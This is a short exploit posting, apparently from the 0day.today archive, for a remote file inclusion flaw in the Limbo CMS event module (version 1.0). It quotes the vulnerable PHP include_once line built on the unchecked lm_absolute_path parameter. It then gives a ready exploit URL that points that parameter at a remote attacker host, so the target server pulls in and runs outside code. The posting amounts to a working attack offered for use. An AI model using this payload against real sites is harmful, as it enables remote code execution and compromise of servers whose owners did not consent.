id: 1331
date: 12/27/2006
title: Limbo CMS Module event 1.0 Remote File Include Vulnerability
author: xoron
cves: 

============================================================
Limbo CMS Module event 1.0 Remote File Include Vulnerability
============================================================


-----------------------------------------------

Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");

-----------------------------------------------

3xplo!t:

http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil_scripts?


-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-                                                         -
-----------------------------------------------------------




#  0day.today [2023-03-26]  #